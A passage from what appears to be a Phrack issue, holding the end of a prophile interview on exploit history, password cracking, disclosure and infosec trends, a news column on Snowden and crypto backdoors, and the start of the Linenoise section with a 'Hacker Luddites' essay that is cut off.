|=---=[ What's your opinion about Phrack?

I was about 10 years late to the party.  I think I got my hands on a pack
of Phrack issues for the first time in 1994 or 1995.  Phrack has been
changing: it had already changed by the time I first saw it, and it has
changed since.  I think that's fine.  It doesn't need to revert to the
US-centric phreaking/anarchy zine of 1980s, nor try to play the same role
that it did in 1990s now that there are many other alternatives.

Over the many Phrack issues so far, it captures diversity and evolution of
the underground.  The diversity just among the people prophiled is of such
extent that on one hand they don't quite fit (e.g. I'm mildly offended to
be prophiled after certain other individuals had been some issues before),
but on the other that's how it is in life.  Similarly, the philes range
from utter crap (luckily not much of it, such as the uncalled-for ridicule
in the Loopbacks) to inspirational or capturing the diversity of scene
spirit or (lately) opinions on the scene dying (or maybe not), and to
quality technical content (a lot of it).

Of course, opinions on what constitutes utter crap vary.  For some of your
readers, much of what I wrote above will be whitehat crap (ethics huh?) or
just off-topic (historical software development thoughts in Phrack, huh?
where are all the sploits? yet that's the balance I preferred, as the
prophile is on me and I'm not only into (in)security and colored hats).

As I don't worship Phrack, frankly I've actually read or even skimmed over
only a minority of the issues/philes.  With my Issue #53 article and this
prophile, I've probably already spent more time writing for Phrack than
reading it.  As a Soviet joke goes, I'm a writer and not a reader.

|=---=[ What you would like to see published in Phrack?

I like good people and quality content, but I realize that the diversity is
also what makes Phrack valuable as what it has been so far.

So the diversity should be preserved, albeit not to the extent where us the
"sensitive whitehats" (really, even with some of the risque fiction I wrote
above?) or them the "terrible blackhats" would refuse to contribute to
further issues.  Of course, I don't mean these labels literally - as FX
said and I agree, undef($hat); - oh and Perl is fine with me, but I do
think the editors need to strike a balance between whatever there is.

|=---=[ What do you think is the role of Phrack in the current "scene" that
        is dominated by "cons"?

Phrack is in fact less important now that there are so many other ways to
share one's experience, research, or rants - and by far not only at cons.

What I think Phrack may continue to provide is perspective over an extended
period, including via these prophiles, as well as by soliciting and
selecting for publication articles that are of longer-term relevance.

|=---=[ Who or what inspired you to start hacking?

Friends have helped introduce me to things, and conversely I made friends
while doing things.

Technical challenges.  Curiosity to explore.  Exposure (and addiction?) to
the networked world beyond local BBSes, and survival (will I be on the net
tomorrow?)

|=---=[ We know that no one will ever admit he's part of the underground,
        but, when and how did you enter it? :>

What's underground and what's not is fuzzy, but as it happened in 1994 a
friend I had made on BBSes/FidoNet invited me (as a coder) to a group he
was starting and to private BBSes.  At about the same time, I also got on
the Internet and wanted to retain my access and to explore, and I got in
touch, via IRC and such, with folks in other countries, both demoscene and
software cracking scene.  As I recall, mARQUIS of the recently formed uCF
had released a cracked version of EXE Manager, my software protection
tool.  I joined their channel for a friendly discussion, and ended up
being invited to and joining the group.

|=---=[ What do you consider your most notable technical achievement?

May I list several that I find somewhat notable?  I think all but possibly
the most recent would have been invented by others by now.

I think I helped accelerate the move from shellcode to borrowed code, with
that 1997 posting of first ret2libc exploits.  Initially, this appeared to
have made no effect, but then things started changing, and changing a lot.

In the same posting, I also introduced what later became known as ASCII
armoring (unfortunately, a term that was already used to refer to something
unrelated: binary to text encoding in PGP).  I suggested placing code that
should be out of easy reach of exploits via C strings at addresses that
contain at least one NUL byte in them.  (In that posting, I called this a
"fix", which I now regret.  I should have written "partial mitigation".)

I was first to bring non-executable memory protections to Linux and to x86,
initially just the stack (then extended to much more by PaX Team).  This
was not unique for operating systems in general - there was already Casper
Dik's patch for Solaris on SPARC, and Digital Unix on Alpha had
non-executable stack by default - but it was new to Linux, to x86, and to
free software (Solaris was non-free).  At first, upstream maintainers
opposed this, but later (when I had given up and moved on) it was embraced
by Linux and other free and non-free operating systems.  If I had not
started that discussion/controversy at the time, and someone else did
later, maybe the persuasion timer would start ticking later as well.

JtR's incremental mode, in its initial form introduced right with version
1.0 in 1996 (and tested privately in an unreleased cracker in 1995), was
novel: being able to search a password space exhaustively, yet in a smart
order.  Before JtR, it was one or the other: dumb exhaustive search, or
smart non-exhaustive search.  (I guess NSA and the like must have had
developed approaches like this before and beyond, but I am unaware of
publications or released tools of this kind predating JtR.)  With this
approach, already on computers of the time, it was practical to crack some
non-word-based yet word-like 7- and 8-character Unix passwords.

JtR's built-in ability to train on previously cracked passwords (generate
incremental mode's sorted charsets), IIRC introduced in 1997, was probably
novel as well.  Indeed, people were optimizing wordlists, etc. based on
cracked passwords before, but not with a built-in feature of the cracker.

I was first to apply/extend bitslice DES to descrypt, also in JtR, in 1998,
running especially well on Alphas (the speedup from x86 to Alpha for the
bitslice DES code of the time was comparable to the speedup going from a
CPU to a GPU now).

With a team, we demonstrated that it is practical to have a
fully-functioning Unix-like system without SUID programs, and that it is
possible to do so much more (than others do) within the traditional Unix
permissions model.  Unfortunately, this is, with few exceptions (e.g.,
Vixie Cron is such a lucky exception), not being embraced by others.
*BSD's stay with their SUIDs, and many Linux distros go beyond the
traditional Unix permissions prematurely.

More recently, the concepts of ROM-port-hardness (first presented in my
ZeroNights 2012 talk, with the slides online so I won't explain it here)
and multiply latency hardening for password hashing, KDFs, and
cryptocoins.  Multiply latency hardening is about tying up RAM for a
duration that cannot be made many times smaller through higher bandwidth
alone, but only through also improving integer multiplication latency,
which CPUs are optimized to be very good at.  (Some attack speed
improvement is indeed possible with ASICs anyway, but not as much
improvement as there would have been without such hardening.)  It is
also applicable to other areas, such as timed-release encryption.

The above list might look like a lot done, or like too much bragging, or
like too little done.  My own assessment is too little done per time spent.

|=---=[ Related to the previous question: Can you give us some background
        information? How and why did you come up with this? Can you give us
        an anecdote story related to it?

Regarding the ret2libc exploits, as I mentioned in the 1997 posting some
credit for this goes to Pavel Machek, a Linux kernel hacker who had
challenged me with the possibility of borrowed code attacks (without such
wording at the time, I think) on my non-executable stack mitigation.
Always thinking both defense and offense, I went ahead and implemented
those very first ret2libc exploits, and posted them.

My secondary(?) motivation was "to prove that exploiting buffer overflows
should be an art", as I wrote at the end of that e-mail.  A typical buffer
overflow exploit at the time was copy-paste from Aleph1's Phrack 49
article, even replicating the misindented __asm__("movl %esp,%eax"); line.
That was dull.  Compare this to today's assortment of memory corruption
exploits, which often are pieces of art.

|=---=[ Was your most notable technical achievement also the one that was
        the most fun?

While notability can be (mis)judged through the reception by others, and
this is a reason why I chose to emphasize the ret2libc exploits, I have no
such criteria for "most fun".  These exploits certainly were fun, and there
was that satisfying feeling re-reading their code, but were they absolutely
the most fun?  I'm not sure.  Many things I did were fun.

Exploration of VM-based software obfuscation possibility was fun (even if
possibly of negative ethical value as "intellectual property" protection
might be in general, although there are other potential applications of the
idea, such as for weak "whitebox crypto in the cloud" in modern speak).
Some people liked the PoC, and there were friendly copycats.  I didn't
pursue this further as I fully went into FOSS at about the same time.
A couple of years later, I was surprised to find a disassembly of my PoC in
a printed magazine, with concerns raised that the technique could be picked
up by malware.  I think this hasn't happened, but I suspect that my PoC
might have influenced the creation of VMProtect (IIRC, it also used NOR as
an emulated instruction, but added many other instructions thereby spoiling
the idea).

There were some technical feats that were not notable in terms of influence
(either because they had no such value or because they were not exposed or
were overlooked), but certainly were fun.  I mentioned some among the
"memorable experiences".  A maybe-curious one, implemented in 1995-1996 for
DOS as JMPTRACE.EXE, was guiding a program's user and making and comparing
as many as needed dumps of the program's control flow instructions' status
(not-reached, taken, not-taken, varies) to spot the instructions changing
between two sets of dumps, and automatically generate a patch to force
program behavior to one path or the other.  It was fun to see this produce
cracks in under a minute, removing the need for any manual work in simple
cases like this.  This is extending and re-applying game cheating tools'
old idea of comparing memory dumps to spot the one right variable.  Sounds
obvious, yet I'm not aware of others having done it before.

|=---=[ When you came up with the unlink metadata attack for Mozilla's
        heap, did you look for it in other linked list allocators? Did you
        realize its full potential at that time?

Actually, the attack as originally discovered and demonstrated was not on
Mozilla's allocator, but on whatever allocators of the underlying system
Mozilla used - so yes, as the advisory I published at the time said, the
technique was shown to be applicable to glibc's and Windows' allocators of
the time.  And yes, I did realize, and maybe I should have written a
separate article on just that.  I was trying to make two points at once:
that file format parsers are a major risk, and that "heap overflows" are
exploitable in this generic way.  Arguably, placing them both in one
advisory obscured the latter, but as we see from further publications by
others, including in Phrack, it was not fully missed either.

Want an anecdote on this one as well?  I first triggered the bug when
trying to optimize a JPEG for my website.  I deleted the comment in vi, but
updated the comment length incorrectly.  The browser crashed, and I didn't
let this stay non-investigated.  (These days, I grew older and oftentimes I
just ignore software crashes, letting those bugs live.  What a pity...
although I imagine the pro-bug folks would appreciate that.)

I first exploited the bug into branching to a controlled address in gdb
before having ever looked at the corresponding source code of either
Mozilla or glibc.  It's this low-level / binary approach that enabled me to
see what was possible.  If I had switched to reviewing the source code
sooner, I might not have realized the bug was exploitable.

I only looked at Mozilla's source code and at the relevant place in glibc
for figuring out what exactly was happening in higher-level terms, and for
writing it up for others.  Oh, and for producing a reliable binary patch.

|=---=[ Some of your older publications are "offensive", while in the
        recent years you seem to have focused on more "defensive" research.
        Do you agree with this statement? If yes, what were the reasons for
        this change?

I was always exploring both sides since I got into "software protection"
and (in)security.  It is possible that I alternated my focus between the
two over the years, yet I can't imagine me working on defensive research
without at the same time considering attacks on the solution or mitigation
being designed.  For example, my Phrack 53 article was both defensive and
offensive, and I dropped what later became known as hashDoS in it.

It is true that I mostly quit developing memory corruption exploits after
having published just a few (innovative) ones in late 1990s.  A reason for
this is that the desired effect was achieved, whether due to my work or/and
otherwise: people started producing advanced rather than dull exploits.

Similarly, I was one of the first (possibly the first?) to exploit a buffer
overflow on the Windows platform (in 1996, then published Windows 95 and NT
shellcodes in January 1997), but I quit almost right away as other people
also started bringing the Unix attack knowledge onto Windows.

I still co-maintain John the Ripper, which is an offensive tool.

I recently participated in a project to implement energy-efficient bcrypt
cracking on Epiphany and FPGAs, which is also offensive.

I designed yescrypt, which is defensive, but in the process I went through
lots of attacks on it.

Yes, our Openwall GNU/*/Linux project is defensive.

|=---=[ Related to the previous question: Which of the two do you think
        bears more fruit for a researcher; offensive or defensive research?
        Which of the two increased your learning and understanding more?

I'd say offensive as you need to consider attacks when working on defensive
research.  What may happen in practice is that when you naively go
defensive-only, others break your defenses (e.g., my early and naive
software protection schemes) and make you learn in that way.  If you're
lucky, or if you deliberately provide the incentive (bug bounty?), this
happens early on, before there's too much at stake (and then you start
thinking like an attacker as well... or you fail as a defender).

|=---=[ What's your take on the IT security industry vs. "the underground"?

A large part of today's IT security industry that I'm in contact with grew
from 1990s maybe-underground, so it's people we have a common understanding
with.  It's good.

As to the industry vs. today's underground, I don't know.  I guess there's
some overlap.

There's also some overlap of the civilian IT security industry (and
presumably the underground) with the military, intelligence, and law
enforcement.  Some are contributing to ethically questionable efforts.
(I am not implying that any work for governments is ethically questionable.
A lot of it isn't.  That's where the Internet came from.)

There's also the military rhetoric (such as "cyberwar"), which gets picked
up by non-tech yet powerful people.  This is a theme of my ZeroNights 2014
keynote game: "Yesterday infosec was such an easy game to play.  Now we
need a place to hide away?"  Was it really a game back then?  And is it
still a game now, or is it time to hide away (move on to the many
non-security areas where we can constructively hack useful things without
ethical uncertainty)?  I have no "authoritative answers" to these; I just
like to remind us to ponder on this in our decision-making on what to work
on next.

Finally, there are marketing-mostly companies and activities, which are
leeching funds without doing much else.  These happen to provide a false
sense of security, and vulnerabilities in the security software itself.

Overall, I think most IT security expenditures are not cost-effective, but
it's similar for other large industries.  Wasted money isn't necessarily
bad per se.  Money has no inherent value, it's just an instrument in the
economy and it's voting power.  What matters is whether the expenditures
result in people wasting their and others' lives on unhappily doing useless
work or not.  Unfortunately, they do, but not to as bad an extent as it
might seem at first.  (And yes, this also affects distribution of wealth.)

Besides IT security industry, there's also much increased attention
(compared to 20 years ago) to security elsewhere in IT, as well as much
improved knowledge of how to tackle safer design of IT systems.  This is a
lot more cost-effective than spending on security on its own or as an
afterthought.  It provides not only security, but robustness, and in ways
that impose fewer restrictions on the users.  Speaking of restrictive
security, this reminds me of anti-security and its less reasonable aspects:

Did you possibly mean your question in context of the (arguably eroded)
anti-security movement of 2002-2009 (arguably different from its earlier
form of 2001)?  I think that's a false dichotomy built upon several likely
flawed assumptions.  As I understand, one assumption was that the security
industry's growth was contributing to decline of the underground.  I think
it actually was change and not decline.  Yes, some people were growing up
and moving on and into the industry (no, this didn't make them "enemies"),
but also a new generation was joining the underground.  Phrack largely lost
its anarchy aspect, even prompting "fake Phrack" during that period, but
whatever happened to Phrack, etc. didn't necessarily speak of the entire
underground.  In fact, that very movement exemplified the diversity that
continued to exist and flourish (even if with some aspects I personally
wouldn't condone, since those infringed upon freedom of choice by others).
Another assumption was that the security industry still depended, and in a
"bad way", on sustained scaremongering and on real security threats found
in full disclosure publications.  I think that even if (hypothetically)
those ceased, the industry would grow at roughly the same pace, and it
wouldn't be any more focused on real threats.  On the contrary, I think it
would be spending a larger fraction of resources on people unhappily doing
useless work, with no reduction in total resources spent.

This is my prophile, and thus my opinion; I do not claim it is the ultimate
truth.  I hope I haven't built a strawman, but in case I have please take
the above paragraph on its own merits (not necessarily referring to the
specific movement).  I was mostly not around during those years, so I could
well have missed crucial detail, and I understand that anti-security wasn't
only about those things (and I think initially not about them at all).

|=---=[ What is your stance on full-disclosure vs non-disclosure? Are there
        situations where both are needed, or is it one or the other?

I generally favor full disclosure, but I don't oppose occasional use of
coordinated disclosure prior to the full disclosure.  I do oppose excessive
use of coordinated disclosure, as well as excessive embargo periods.
I also buy into Ted Unangst's suggestion to call this "selective
disclosure", with the negative connotation.  This is why I agreed for
Openwall to host not only the oss-security list (where full disclosure is
practiced), but also the (linux-)distros lists (for advance notification
to distro vendors, PGP re-encrypted).  As someone hosting them, I get to
dictate policy, not letting issues stay in the limbo for too long (and
forcing them to be brought to oss-security).  Obviously, what's
"excessive" and "too long" is subjective (there is a published policy on
that for our lists, but how we came up with this specific policy is
subjective).  And yes, it's necessarily "selective".

I am generally against non-disclosure, but there may be exceptions.  As I
understand, it exists out of intent to use or/and profit off of one's
finding, concerns of others taking advantage (unfair or any at all) of
one's finding defensively (you doing free bug hunting for the vendor),
offensively (use of your recent disclosure for attacks on not-yet-patched
systems), or/and commercially (scaremongering, marketing, actual security
products), concerns of getting oneself in trouble (e.g., the vendor going
after you), not wanting to lock other hackers out, increased appreciation
of the bugs (letting them live just for the sake of it), not wanting to
affect game dynamics, lack of motive (perceived need) to disclose, or/and
just laziness.  This list is probably non-exhaustive.

I think there's rarely an ethical way to profit off of a bug without its
planned public disclosure (remember, this might not be a game anymore) and
there are plenty of other ways to make decent money, including in IT
security, without such ethical compromises.  I can sympathize with many
possible reasons for one's choice not to disclose a bug, especially in
context of jailbreaks or DRM (thus, retaining the essential freedom to
fully utilize one's own devices or content).  However, it should always be
considered that information may leak or be rediscovered by others.

|=---=[ Some claim that the hacking scene is growing old and that there are
        not enough talented young people interested in hacking to replace
        it. What are your thoughts on this?

There are plenty of talented young people interested in hacking.  What may
be changing (or maybe not) is scene spirit.

|=---=[ What is your advice to the new hackers reading this?

I tried to share some maybe-wisdom throughout the pseudo-memoirs and
answers above.

FX's advice of "Try Harder 2 Be Yourself" makes sense to me -
individuality, curiosity, creativity.  Being a hacker is about all of
those things and, whatever the darker undef color folks say, it isn't
necessarily about ever hacking into systems, which might or might not even
be relevant (depending on creativity involved or lack thereof).  Last but
not least, try to be a good person, while at the same time staying
yourself.  (Few people are genuinely bad.)  This means integrity, too.

A hacker shouldn't need guidance.  If you feel like asking an old-timer for
guidance, you're probably on the wrong path.  Rather, it should be about
your own creativity, and you'd find you have more curiosity and more
things to explore than you have time for.

However, it is in fact helpful to be introduced to things you might not yet
have found on your own.  Also, it is OK to bring up specific questions -
not of the sort "what's next", thus not step-by-step guidance, but asking
in appropriate communities for advice on very specific technical issues you
already ran into.

The landscape has changed.  On one hand, the previously low-hanging fruit
has been explored, so the barrier to entry may be higher now.  On the
other, a lot of information and tools are now easily available, and there
are friendly communities that are even easier to reach than before, and
without the elitism too, so the barrier to entry may have lowered.
Overall, it's just different.  There's new low-hanging fruit too - e.g.,
for the coming "Internet of things" you'll end up building upon and
porting over the previously explored attack techniques to this new area,
and hopefully finding something creative about it as well.

It's probably riskier (and less of a game) to explore systems online now,
but on the other hand you can have plenty of rare systems in emulators/
VMs, and you can "hack" in CTFs, which really are just games (good!)  Bug
bounty programs provide you a previously unheard-of opportunity to not
only explore some systems online in some limited ways, but also get paid
for it - and it's a game (also good!)  You don't have to worry about how
you'd get online to connect to a CTF server tomorrow.  There are no such
survival challenges in today's CTFs.  You wouldn't even voluntarily go for
the headache of the network lag and frequent disconnects, even though
technically those could be simulated.  The spirit is probably very
different now.  Times change.  (But maybe not yet by this much in some
developing countries?  Just like USSR/Russia was lagging behind back then.
As a cat, I see a lot of naive mouse activity from Indonesia, so maybe it's
still like that in there, perhaps with wireless in place of dialup?)

Firmware hacking has probably stayed the same, including the spirit, and in
fact the range of opportunities has expanded.  Lots of ethically sound
opportunities there, too.

There are many ways to be a hacker without ever getting into (in)security -
e.g. hacking on non-security aspects of a free operating system - or even
without focusing on computing, although there's a hot and highly relevant
area which does involve computing: bioinformatics.

|=---=[ What is the future of hacking? The future of "the underground"?

Hacking will go on, in all meanings of the word.

The underground, the kind of it that I consider positive, might be getting
blended with other communities, although I hear there are forums that have
sort of replaced private BBSes of before.

There will also remain for-profit groups (and their forums, communities,
etc.) that technically are underground, but that's different - not the
kind of underground I possibly associated with.

Very different kinds of hacktivism will also continue, and I think these
are for human rights, transparency, protests, and attempts to influence the
game (many or most of them misguided).  Also a lot of malicious and just
for fun trolling and stalking, but masquerading as hacktivism - that's not
even hacking, but it can involve e.g. (D)DoS attacks and thus be lumped in
with hacking/hacktivism.  Also manipulation of public opinion via technical
means (automated sockpuppets, etc.), including attributed to state actors.

|=---=[ What do you think the biggest infosec challenges for the next 5
        years are/will be? And what should be done about them?

5 years is not that much, so the challenges will stay mostly the same as
today's.  Attention will be shifted to some specific areas all of a sudden,
like we've seen it happen for SSL/TLS starting with Heartbleed, but this
does not mean those areas actually suddenly started to need more attention
(maybe they needed it before as well, and/or maybe they don't deserve as
much now).

Below are some that will be changing from today's.  This does not mean
they're the absolute biggest challenges - I think the biggest are the same
as today's - but they might be among the biggest that change from today's:

Use of virtualization will increase even further, on all kinds of devices,
including with nested and mixed technologies, which will bring new code and
new bugs with it (such as in front-end software and middleware used to
manage those VMs/containers), and inconsistent/violated security
models/assumptions.  Ideally, there should be demand for under-the-hood
simplicity of such solutions, but unfortunately this demand is lacking, and
so will the supply, likely resulting in some ridiculously complex and
inconsistent systems.

Use of "microservices" will continue to increase, and so will server-side
request forgery attacks - and defenses against those.  With separation of
backend services improving, there will be an unfortunately to-be-missed
opportunity to make it privilege separation rather than merely operational
separation.

For crypto, some of those backend servers could act as HSM-alikes, but this
opportunity will also be missed due to HSM-alikes requiring HSM-like rather
than server-like sysadmin practices.

Use of centralized management will increase - config file management across
all of organization's virtual and physical servers, etc.  This means a
single point of failure, and of security compromises too.  We could have
gained intranet security boundaries through greater separation of backend
services, but instead we'll lose them through greater centralized
management.  This applies to (security) event monitoring, too.

With more levels of abstraction, (live) migration, hosting infrastructure
outsourcing, and increased use of solid-state non-volatile memories
(ranging from "disks" to "RAM"), it will be even harder (and arguably
counter-productive) to keep track of actual devices underlying the logical
assets and, even once located, to securely wipe those devices when they're
to be retired (hard to do for flash memory with over-provisioning and wear
leveling) - but people typically neglect to do this now anyway.

IPv6 deployment will increase more rapidly than it did in prior 5 years.
We'll see more talks about the inadvertent security exposures this brings.

Use of encrypted communications will continue to increase, with technical
pressure put on those who are lagging behind in protocols support (upgrade
or fall off the net).  As a side-effect, this will prevent some legacy
systems from being accessed or from talking to many newer systems.  In
some cases, we'll see fallbacks to unencrypted communications where
previously legacy encryption was being used.  In some other cases, we'll
see software updates stop being installed, thereby leaving systems exposed
to more vulnerabilities for longer.  I'd like to see a saner, case-by-case
approach here - e.g., with opportunistic encryption, there's little point
in insisting on the latest protocols (refusing legacy ones), and a
WordPress updates server isn't really helping security by denying
connections from older systems.  Unfortunately, I don't expect an
improvement in the approach taken (in part because case-by-case is
necessarily more complex than one-size-fits-all guidance), and so there
will be more collateral damage.

With luck, we'll see another spike (after 2013's) in demand and hopefully
supply for line-rate encryption in high-speed network devices, due to a
combination of genuine security-consciousness and hype and marketing
opportunities.  Assuring security of encryption provided by those typically
proprietary devices will be tough (e.g., does this one device actually
provide perfect forward secrecy?)  Ideally, there should also be demand for
at least some openness of such devices for security review.

SCADA will move even more into the spotlight, and will remain with lots of
low-hanging fruit for years.  Cars and IoT will continue to join SCADA
under the spotlight.

Control over end-user devices will continue to be taken away by the
vendors, and jailbreaks will continue too.  Arguably well-intentioned
hardware backdoors (remote management, anti-theft, etc.) will continue to
be introduced, and will remain a concern.  Open hardware projects will
advance, and more of them will be started, including in response and
trying to address these concerns.  Backdooring potential of taped out
designs at chip foundries will become more relevant and thus a topic of
more discussions.

As open CPU designs (such as RISC-V and J Core aka free SuperH) succeed,
there's also good potential for an open FPGA with a FOSS toolchain (perhaps
building upon existing FOSS projects such as Torc and Yosys).  This could
be crowd- or/and VC-funded, and having it would address some concerns.

|=---=[ Open question. Anything more you would like to say to Phrack
        readers?

I can neither confirm nor deny anything stated in this prophile.

I wrote a lot (sorry for your time!) and I included some possibly strong
opinions, but I do not mean to speak with authority.  My involvement in the
underground, if any, has been rather limited and brief, nor am I a true
old-timer (1990s wasn't that long ago).  I also would like to apologize to
past/other(?) Phrack editors as I had refused to be prophiled before on
two(?) occasions.  It felt like too much of a drag and events were too
recent.  Time had to pass so that I could provide perspective, as I tried
now.  Nothing to do with Phrack's editor teams changing, just the timing.


|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x03 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack World News ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------=[ by the Phrack staff ]=-----------------------=|
|=-------------------------=[ staff@phrack.org ]=------------------------=|
|=-----------------------------------------------------------------------=|

Wow, 4 years have passed! One of the possible positive outcomes of slow-
paced releases of Phrack is that Phrack World News gives us the opportunity
to look back on a few years worth of happenings and ponder about the bigger
picture for a moment. First of all: Snowden. It feels like ages ago now,
but, for anyone living under a rock, in 2013 Edward Snowden [1] leveraged 
his position working at the United States National Security Agency to copy 
and later leak [2] classified documents on NSA's global surveillance 
operations. If the very previous issue of PWN [3] prophetically warned 
about the massification of surveillance as a threat to our civil 
liberties, the Snowden leaks only proved what hackers and conspiracy 
theorists had believed and proclaimed for a long time: the US government 
unlawfully spies on its own citizens as well as everyone else's.

While it is probably futile to believe that the social and political
reactions to the Snowden leaks have had any meaningful impact on the NSA's
operations, the disclosed information is an invaluable resource to validate
that governments will go a long way to collect intelligence as broadly and
deeply as they can. The leaks have shown that the tactics employed by NSA
ranged from the widespread tapping of phone (e.g. voice, SMS) and network
traffic to more punctilious methods such as the intercept and tampering of
export computer and network equipment to insert spying implants. This does
not mean, of course, that we have global surveillance "figured out". In
fact, quite to the contrary, it should be expected that many of these
techniques have been revamped by now, and that many more are to follow, as
a natural step in the continuous endeavor for stealthiness. As such, any
effort, technical or otherwise, to safeguard your privacy is more valid
than ever.

But indeed, it seems that some of the efforts on designing and implementing
better crypto systems paid off and governments are starting to have their
monitoring and investigative capabilities limited by evolving security. One
indication of that is the growing insistence of various nations on the mind
-boggling hopelessly insane push for crypto backdoors [4]. The sad and
unfortunate wave of terrorism the world has been dealing with is repeatedly
and shamelessly used to support the lobbying for less information security.
Another (at the moment) ongoing instance of this is the significant dispute
between the FBI and Apple [5], which refuses to provide the FBI with a way
to bypass the lock screen of a terrorist's (and everyone else's) iPhone.

And sure enough the controversies involving governments and information
security do not stop there. In the past few years we have seen some nations
being more frank about their offensive capabilities [6] or sometimes
industry-sourced intelligence [7] combined with publicity on more impactful
attacks [8] helped demonstrate that hacking is increasingly a bigger deal
for nation-states. All of this action is (or has been posed as) a driving
force behind moves such as adding "cyber weapons" to the terms of the
Wassenaar agreement [9], an initiative that, if not carefully formulated,
will turn out to be not only utterly ineffective but also extremely harmful
for the practice of security research and, in consequence, to the
progressive development of information security in general. Plus, other
recent breaches, such as Gamma [10] and Hacking Team [11], tell us that
even government-affiliated organizations are freely operating without
respecting UN embargoes and international regulations anyway - ironically,
it was hackers and the security community that exposed them, and not law
enforcement. So, who is the law working for?

Lastly, and with a heart heavier than any of the topics above could ever
cause us, Phrack would like to say goodbye to a few illustrious members of
our community that have sadly passed away. Since it's been 4 years we
are not going to attempt to list out every instance, however we can
easily say that as a community we have lost some incredibly talented,
charismatic and fantastic people, and we feel the loss greatly.


Live free,

- The Phrack Staff


[1]  - https://en.wikipedia.org/wiki/Edward_Snowden
[2]  - http://www.businessinsider.com/snowden-leaks-timeline-2014-6
[3]  - http://phrack.org/issues/68/3.html
[4]  - http://www.theguardian.com/technology/2015/nov/18/
       us-europe-reignite-debate-back-door-encryption-paris-attacks
[5]  - http://www.wired.com/2016/02/apple-brief-fbi-response-iphone/
[6]  - http://www.wired.com/2016/01/
       nsa-hacker-chief-explains-how-to-keep-him-out-of-your-system/
[7]  - http://www.wired.com/2013/02/chinese-army-linked-to-hacks/
[8]  - http://arstechnica.com/security/2015/06/
       why-the-biggest-government-hack-ever-got-past-opm-dhs-and-nsa/
[9]  - http://blog.erratasec.com/2015/05/some-notes-about-wassenaar.html
[10] - http://www.zdnet.com/article/
       top-govt-spyware-company-hacked-gammas-finfisher-leaked/
[11] - http://www.wired.com/2015/07/
       hacking-team-breach-shows-global-spying-firm-run-amok/

|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x04 of 0x10

|=-----------------------------------------------------------------------=|
|=-----------------------=[  L I N E N O I S E  ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[     various     ]=-------------------------=|
|=-----------------------------------------------------------------------=|


An old Phrack Staff member and friend used to say that "a strong Linenoise
makes a good release". 

We begin our journey with an interesting philosophical article, "Hacker
Luddites" by an anonymous author. TL;DR, ever had an iPhone? Have you
realized you don't actually own something you paid several hundreds of
bucks to acquire? The "cloud era" trend, which has convinced many people
as well businesses, to literally grant owning rights for their data to
large corporations, is now everywhere. How is it affecting our state of
mind and where is this going?

Our technical part is very strong. Baudsurfer developed an interesting ASM
chess game in just 256 bytes; read the heavily-commented code and feel the
nostalgia in your bones. More old-school goodness in a lovely article
dealing with secure shells and how one can exploit common misconfigurations
to bypass various limitations and break out of restricted environments.
Articles like this have a lot to offer to the hacking community. We urge
our dear readers to follow DangerMouse's example and submit more articles
like his!

The next article has a strange back story. We received this submission
long ago and we decided to publish it. Admittedly, a lot of time has passed
since then. The author has stopped replying to mails, but he was originally
positive about publishing his work. Read it and see how you can cause
short ID key collisions in GPG. As our everyday computing machines become
increasingly powerful, such attacks become more and more realistic.

Following that are two excellent short articles exploring subjects every
exploit developer is doomed to deal with, namely boundary conditions and
shellcoding. Our rotten haxor chown has written a nice guide on how to use
Microsoft's Z3 solver to facilitate the process of exploit development.
Recently (well, maybe not so recently, lulz), there has been a shift
towards more formal methods even by old-school haxors who have always
preferred and obeyed the KISS (Keep It Simple, Stupid!) primitive. Hackers
have understood that the process of vulnerability discovery as well as
exploit development can be augmented by modern mathematics and maybe become
even more interesting! One cannot easily forget p64_0x08.txt, right? In the
next article, fishstiqz shows us how you can simply use your compiler to
easily build shellcodes for Windows. If you ever thought shellcode
development on Microsoft's operating system is a pain in the ass, then
this article is definitely for you.

Last but not least we have an opinion piece on the vulnerability
disclosure circus, the incentives and the related moral questions (lulz)
by two anonymous contributors. It is balanced and dispassionate and we
urge you to read it in the same manner.

That's it you greedy mofos, another strong Linenoise! Enjoy!


--[ Contents

    1 - Hacker Luddites ................................... anonymous

    2 - Chesslin .......................................... Baudsurfer

    3 - He Compels Secure Shells .......................... DangerMouse

    4 - Personalized PGP Key IDs .......................... f1los0tt1l3

    5 - How to cheat at maths ............................. chown 

    6 - Shellcode the better way, or how to just
        use your compiler ................................. fishstiqz

    7 - Resisting the Hy(p|v)e ............................ anon & anon


|=[ 0x01 ]=---=[ Hacker Luddites - anonymous ]=--------------------------=|


In the west, far gone are the days of slavery. Men live freely with their 
minds and bodies. So the idea of technology potentially limiting these 
things is absurd.

Computer technology today might not always encourage these principles of 
free mind and body though. Hardware and software is increasingly built in 
the same manner as stone walled gardens, restricting those outside the 
inner circles of technocrats. The designers decide to clutch tightly to 
their systems, defining the full set of actions allowable and therefore 
thinkable on their systems. They are limiting the potential for 
creativity, discovery, and reason in order to further profit. This profit 
is furthered by control because certain control limits piracy, stops 
malicious software from propagating, simplifies the user experience for 
the majority of consumers, and creates revenue through software-regulated 
micro decisions that constrain the full capacity of the hardware and 
software systems being sold.

Only the masters of the garden, the designers, are allowed inside the 
stone walls, where they are free to create and are conscious of the inner 
workings and plans. Those outside are not allowed inside the garden. Those 
who are not inside the circle of the original creators do not get to 
create without delegated permission. And consumers and third-party 
developers are too far down the caste system to be allowed arbitrary 
control of their own possessions.

This leaves the creators on the outside of the stoned walls dependent on 
brilliant and dedicated minds to bypass the wishes of the designers. These 
brilliant minds attain a level of consciousness about the constraints of 
the system that the designers themselves did not understand, and pass this 
on to the masses. Along the way come miscreants, thieves, and pirates.

In a free market system, if more arbitrary creation is vital in the long 
term, then more creative systems will arise to fill the need. In the short 
term, allowing feedback from the outer castes and integrating their ideas 
has been shown to be more than sufficient for sustained exponential growth 
on the rise to market domination.


Hacker Luddite: (Oxymoron) A person opposed to technology that greatly 
limits, through artificial means, human potential for consciousness, 
reason, or creativity with that same technology.

Hacker Luddites hate stone wall garden technologies. Why shouldn't a 
person be allowed to hold a piece of technology and attempt to modify or 
adapt that technology to suit their will at any given moment? The only 
limitation should be the consciousness required to make changes. And 
